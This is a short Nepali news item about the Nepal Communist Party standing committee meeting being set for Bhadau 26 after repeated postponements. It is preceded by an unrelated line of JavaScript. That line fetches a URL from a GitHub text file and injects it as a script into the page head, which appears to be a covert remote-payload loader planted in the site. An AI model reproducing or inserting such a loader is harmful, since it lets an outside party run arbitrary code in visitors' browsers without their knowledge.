;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ २२,
काठमाडौं । नेपाल कम्युनिस्ट पार्टी (नेकपा) स्थायी कमिटीको बैठक भदौ २६ गते बोलाउने सहमति भएको छ । साउन १३ गते स्थगित भएको बैठक भदौ २६ मा बस्ने सहमति भएको हो ।
आज बिहान बालुवाटारमा पार्टी अध्यक्षद्वय पुष्पकमल दाहाल, केपी शर्मा ओली र महासचिव विष्णु पौडेलसहितको छलफलमा यो सहमति भएको प्रधानमन्त्रीका प्रेस सल्लाहकार सुर्य थापाले जानकारी दिए । अध्यक्षद्वयबीच भएको विवादमा नेकपा बैठक पटक पटक स्थगित हुँदै आएको छ ।
नेकपाको जारी स्थायी समिति बैठक गत असार १७ गतेपछि ७ पटक स्थगित भएर भदौ २६ का लागि डाक्ने सहमति भएको छ ।file Photo
फेसबुक प्रतिक्रियाहरु